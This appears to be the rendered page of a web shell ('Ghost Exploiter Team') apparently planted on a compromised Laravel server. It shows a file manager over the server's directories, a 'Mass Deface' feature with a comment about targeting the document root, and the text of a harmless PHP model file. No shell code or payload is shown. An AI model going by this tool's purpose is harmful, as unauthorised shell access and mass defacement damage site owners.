Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
storage
/
framework
/
testing
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
.gitignore
0.014KB
edt
ren
480f96d77cbe948143b0c5f
...
0KB
edt
ren
ArticleToGroup.php
0.453KB
edt
ren
console.php
0.36KB
edt
ren
<?php declare(strict_types=1); namespace App\Models; use Illuminate\Database\Eloquent\Model; use Illuminate\Database\Eloquent\Relations\BelongsTo; use Illuminate\Support\Carbon; class ArticleToGroup extends Model { protected $table = 'article_to_group'; protected $fillable = [ 'article_id', 'article_group_id', ]; public function articleGroup(): BelongsTo { return $this->belongsTo(ArticleGroup::class); } }
<=Back
Liking